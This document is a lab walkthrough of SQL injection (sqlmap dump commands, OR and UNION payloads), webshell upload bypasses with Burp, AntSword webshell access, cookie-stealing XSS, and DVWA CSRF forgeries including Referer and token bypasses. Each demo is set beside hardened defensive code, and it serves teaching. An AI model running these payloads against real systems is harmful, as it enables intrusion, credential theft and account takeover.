1. SQL injection
First open the pikachu vulnerability practice platform and go to the SQL character-type injection (GET) level. Any word can be entered in the search box.

After submitting, we can see that the search is indeed sent as a GET request, with the input in the URL.

Copy the URL of the page and open sqlmap. The three commands below differ only in the enumeration flags; the URL is the one copied from the browser (this is a lab host, so it is the only place these commands should be pointed at).

List which databases exist:
python sqlmap.py -u "http://192.168.242.1/vul/sqli/sqli_str.php?name=%E9%98%BF%E7%B4%A2&submit=%E6%9F%A5%E8%AF%A2" --dbs

List which tables are in the pikachu database:
python sqlmap.py -u "http://192.168.242.1/vul/sqli/sqli_str.php?name=%E9%98%BF%E7%B4%A2&submit=%E6%9F%A5%E8%AF%A2" -D "pikachu" --tables

Dump the usernames and passwords:
python sqlmap.py -u "http://192.168.242.1/vul/sqli/sqli_str.php?name=%E9%98%BF%E7%B4%A2&submit=%E6%9F%A5%E8%AF%A2" --dump -D "pikachu" -T "users" -C "username,password"
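To see what sqlmap is doing at the character-type level, here is an added example (not code from the pikachu project or from this page) that reproduces the injection against an in-memory SQLite database. The table and column names and the rows are constructed stand-ins; the page only shows that sqlmap found a "users" table with "username" and "password" columns. It shows the quote-terminated string literal, an OR-based bypass, a UNION-based dump of the users table (what --dump achieves), and the parameterised query that stops both.

```python
import sqlite3

# Constructed stand-in for the lab database (names and rows are assumptions).
SCHEMA = """
CREATE TABLE member(id INTEGER, username TEXT, email TEXT);
INSERT INTO member VALUES (1, 'vince', 'vince@pikachu.com');
INSERT INTO member VALUES (2, 'allen', 'allen@pikachu.com');
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'admin', 'e10adc3949ba59abbe56e057f20f883e');
INSERT INTO users VALUES (2, 'pikachu', '670b14728ad9902aecba32e22fa4f6bd');
"""


def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def search_vulnerable(con, name):
    """Character-type injection: the GET parameter is pasted between the
    quotes of a string literal, so a quote in the input ends the literal
    and everything after it is parsed as SQL."""
    sql = f"SELECT id, username, email FROM member WHERE username = '{name}'"
    return con.execute(sql).fetchall()


def search_safe(con, name):
    """Parameterised query: the value travels separately from the SQL text,
    so the input can never become part of the statement."""
    sql = "SELECT id, username, email FROM member WHERE username = ?"
    return con.execute(sql, (name,)).fetchall()


# Two payloads of the kind sqlmap tries. The trailing comment marker (-- in
# SQLite; MySQL also accepts #) discards the original closing quote.
PAYLOAD_OR = "' OR 1=1 -- "
PAYLOAD_UNION = "' UNION SELECT id, username, password FROM users -- "


def demo():
    con = make_db()
    return {
        "normal": search_vulnerable(con, "vince"),
        "or_bypass": search_vulnerable(con, PAYLOAD_OR),       # all members
        "union_dump": search_vulnerable(con, PAYLOAD_UNION),   # users table
        "safe_or": search_safe(con, PAYLOAD_OR),               # no rows
        "safe_union": search_safe(con, PAYLOAD_UNION),         # no rows
    }


if __name__ == "__main__":
    for key, rows in demo().items():
        print(key, rows)
```

The UNION payload works because the page's own query selects three columns, so a three-column SELECT from another table can be appended; sqlmap discovers that column count automatically before it dumps anything.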
2. One-sentence Trojan upload (1)

Lab selected: pikachu Unsafe Fileupload, client check level.

Let's first see what happens when we try to upload a PHP file directly. The site states that only image files may be uploaded, so when we pick a non-image file a pop-up appears as soon as the file is selected, before we even click "Start Upload", saying that the file does not meet the requirements. The check therefore runs in the browser, not on the server.

Bypass posture: client-side validation generally has two bypass methods, (1) disable JavaScript in the browser, or (2) intercept the upload with Burp Suite and change the suffix. Here we use the second one.
First we write a PHP file containing a one-sentence Trojan (a webshell whose whole body is a single eval of a request parameter).

Rename the file to a .png suffix so that it passes the client-side check, start the upload, and intercept the request with the packet-capture tool.

Catch the request as shown in the figure and right-click "Send to Repeater".

In Repeater, change the file suffix in the multipart filename back to .php and click Send. The upload succeeds.

The response shows that the file was uploaded successfully.
3. One-sentence Trojan upload (2)

Lab selected: MIME type level.

Try to upload a PHP file: the page says the uploaded picture can only be in jpg, jpeg or png format.

Bypass methods: (1) upload 123.php, intercept with Burp Suite and change the MIME type to one of the allowed image types; (2) upload sh.png, intercept with Burp Suite and change the file suffix. Here we use the second method.
Upload 123.png, intercept the request in Burp Suite as shown in the figure, and right-click "Send to Repeater".

Change the file suffix to .php and click Send. The upload succeeds.

The MIME type is carried in the Content-Type field of the file part in the HTTP request. In this level's protection code, $mime is an array of legal MIME types, that is, a MIME whitelist; the whitelist is passed as a parameter to the upload_sick() function for server-side checking.
However, upload_sick() has two weaknesses:
(1) It checks only the MIME type, which is supplied by the client and can be changed by intercepting and modifying the request.
(2) The file is not renamed when it is saved, so even if the page did not echo the save path, an attacker could very likely guess it from the original file name.
There is one more weakness in the level as a whole: the save path is echoed to the user. Having uploaded the webshell and learned where it was saved, the attacker can connect to the shell.
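The two weaknesses above, as an added example that is not pikachu's code: a check modelled on the MIME-only behaviour the page describes for upload_sick(), next to a hardened check that also verifies the extension and the file's magic bytes and stores the file under a random name. The whitelist values, the request data and the save directory are assumptions made for the example.

```python
import secrets

# Assumed contents of the $mime whitelist (the page names jpg, jpeg, png).
ALLOWED_MIME = {"image/jpeg", "image/png"}
ALLOWED_EXT = {".jpg", ".jpeg", ".png"}
# Leading bytes of real image files, used to check the content itself.
MAGIC = [(b"\x89PNG\r\n\x1a\n", ".png"), (b"\xff\xd8\xff", ".jpg")]


def ext_of(filename):
    dot = filename.rfind(".")
    return filename[dot:].lower() if dot >= 0 else ""


def upload_mime_only(filename, content_type, data):
    """Weak check in the spirit of upload_sick(): only the client-supplied
    Content-Type is consulted, and the file keeps the name the client sent,
    so the saved path is predictable."""
    if content_type not in ALLOWED_MIME:
        return None
    return "uploads/" + filename.rsplit("/", 1)[-1]


def upload_hardened(filename, content_type, data):
    """Check Content-Type, extension and magic bytes; store under a random
    name whose extension comes from the detected content, not the request."""
    if content_type not in ALLOWED_MIME:
        return None
    if ext_of(filename) not in ALLOWED_EXT:
        return None
    detected = next((ext for sig, ext in MAGIC if data.startswith(sig)), None)
    if detected is None:
        return None
    return "uploads/" + secrets.token_hex(16) + detected


# Constructed bodies standing in for what Burp Repeater sends at this level.
PHP_BODY = b"<?php echo 'not an image'; ?>"
PNG_BODY = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16  # header only, enough for the check


def demo():
    return {
        # sh.php with Content-Type image/png: the weak check saves it as sh.php
        "weak_php_as_png": upload_mime_only("sh.php", "image/png", PHP_BODY),
        "weak_honest_php": upload_mime_only("sh.php", "application/x-php", PHP_BODY),
        "hard_php_as_png": upload_hardened("sh.php", "image/png", PHP_BODY),
        "hard_fake_png": upload_hardened("sh.png", "image/png", PHP_BODY),
        "hard_real_png": upload_hardened("cat.png", "image/png", PNG_BODY),
    }


if __name__ == "__main__":
    for key, path in demo().items():
        print(key, path)
```

Renaming fixes weakness (2) only if the new name is not echoed; the stronger fix is to keep uploads outside the web root or in a directory where the web server does not execute scripts, so that a bypass of the content checks still yields nothing to connect to.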
4. Connect to the webshell

Use AntSword to connect to the backdoor we left behind.

After clicking Add, we can see that the connection has been recorded.

Right-click and choose File Management, and we can operate on the website's files.
The website's file directory is as follows
5. Use pikachu to reproduce XSS vulnerabilities
(1) Reflected XSS (GET)

Select Reflected XSS (GET).

We enter a simple XSS payload to steal the user's cookie.
The admin cookie is obtained.
(2) Stored XSS

This level has no length limit on the input, so we enter the payload directly:

Our record also appears in the message list.
Now if we switch to a different browser and open this level's page, a dialog box pops up, which shows that stored XSS endangers every user who visits the affected page.
6. Use DVWA to reproduce the CSRF vulnerability
(1) Low difficulty
1. First, set the security level of DVWA to Low.

Open the CSRF page.

Looking at the page source at the Low level, the form contains no hidden token.

So we can forge a simple link: append ?password_new=password&password_conf=password&Change=Change# to the CSRF page URL. As soon as a logged-in user clicks the link, the page reports the change:
In this way we have changed the password to "password".
(2) Medium difficulty
1. First set the difficulty to Medium.
2. Open the source code and compare it with the Low level.
Compared with the Low code there is one extra line: if( eregi( $_SERVER[ 'SERVER_NAME' ], $_SERVER[ 'HTTP_REFERER' ] ) )
eregi(pattern, string) performs a case-insensitive regular-expression match and returns true if the pattern is found anywhere in the string, otherwise false.
So this line checks whether HTTP_REFERER contains SERVER_NAME. HTTP_REFERER is the value of the Referer request header, that is, the address of the page the request came from; SERVER_NAME is the host name (or IP) of the DVWA server. To bypass the check, we need the Referer value to contain that host name somewhere, and because only a substring match is done it can appear in the path rather than in the host part.
3. We write an HTML file to serve as the attack page:

<img src="http://192.168.1.102/dvwa-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#" border="0" style="display:none;"/>
<h1>404</h1>
<h2>file not found.</h2>

After writing it, name it after the DVWA server's IP address, for example 192.168.242.1.html, and put it in the DVWA folder under the web root (WWW). The file name is what makes the Referer contain SERVER_NAME.
Open Burp Suite, capture a request on the CSRF page, send it to Repeater, and change the Referer to the form http://<attacker server address>/dvwa/<target IP address>.html, as shown in the figure:
Password changed successfully
(3) High difficulty
1. First set the difficulty to High.
2. Open the source code and compare it with the Low level.
This time a token is added: a random value embedded in the form as a hidden field, which the attacker cannot see, and which the server checks against the user's session. The essence of a CSRF attack is that every parameter of the important operation can be guessed by the attacker; the token breaks that assumption.
So we have to obtain the token.
3. We can use the XSS vulnerability to run a script in the victim's browser that reads the token. Because the input field limits the length of the payload, there are two ways to do this: one is to use Burp Suite to capture the request, change the parameters and resend it to obtain the token; the second is to use the Firefox browser.

We use Burp Suite to capture the traffic and read the session cookie and the token.

After getting the token, the Medium-level attack can be carried out with the token added to the request.
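The Medium and High checks side by side, as an added example that is not DVWA's code: a Referer check with the substring semantics of eregi() (and the path-based bypass from the Medium section), a strict host comparison for contrast, and a session-bound token check that the forged request only passes once the token has leaked, as in the High section. The host name, the attacker URL and the request parameters are the ones used above; the handler shape and the response strings are assumptions.

```python
import hmac
import re
import secrets
from urllib.parse import urlsplit

SERVER_NAME = "192.168.1.102"  # DVWA host used in the img src above


def referer_check_medium(referer):
    """Medium as described above: eregi(SERVER_NAME, HTTP_REFERER), i.e. a
    case-insensitive pattern search anywhere in the Referer string."""
    return referer is not None and re.search(SERVER_NAME, referer, re.IGNORECASE) is not None


def referer_check_strict(referer):
    """Hardened variant: compare the host component of the Referer URL exactly."""
    return bool(referer) and urlsplit(referer).hostname == SERVER_NAME


def issue_token(session):
    """High: a fresh random user_token stored in the session and embedded in
    the form as a hidden field when the victim loads the page."""
    session["user_token"] = secrets.token_hex(16)
    return session["user_token"]


def token_check_high(session, submitted):
    """Rejects when the session has no token or the submitted value differs."""
    expected = session.get("user_token")
    return bool(expected) and submitted is not None and hmac.compare_digest(expected, submitted)


def change_password(level, session, referer, params):
    """Outcome of the password-change request at each level (assumed shape)."""
    if level == "medium" and not referer_check_medium(referer):
        return "blocked: referer"
    if level == "high" and not token_check_high(session, params.get("user_token")):
        return "blocked: token"
    if params.get("password_new") != params.get("password_conf"):
        return "blocked: mismatch"
    session["password"] = params["password_new"]
    return "Password Changed."


# The forged query string from the Low section, and the Referer produced by
# hosting the attack page under a file named after SERVER_NAME.
FORGED = {"password_new": "password", "password_conf": "password", "Change": "Change"}
ATTACK_PAGE = "http://attacker.example/dvwa/192.168.1.102.html"


def demo():
    session = {"password": "old"}
    out = {}
    out["low"] = change_password("low", session, None, FORGED)
    out["medium_no_referer"] = change_password("medium", session, None, FORGED)
    out["medium_bypass"] = change_password("medium", session, ATTACK_PAGE, FORGED)
    out["strict_bypass"] = referer_check_strict(ATTACK_PAGE)
    token = issue_token(session)  # victim loaded the form; attacker cannot read it
    out["high_forged"] = change_password("high", session, ATTACK_PAGE, FORGED)
    # The High section obtains the token through XSS; here it is simply leaked.
    out["high_with_token"] = change_password("high", session, ATTACK_PAGE, dict(FORGED, user_token=token))
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

Because eregi() treats SERVER_NAME as a pattern, the dots in the IP match any character, so the substring check is even looser than it looks; the strict variant compares the parsed host and nothing else. The token check is only as good as the token's secrecy, which is exactly why the High section turns to XSS.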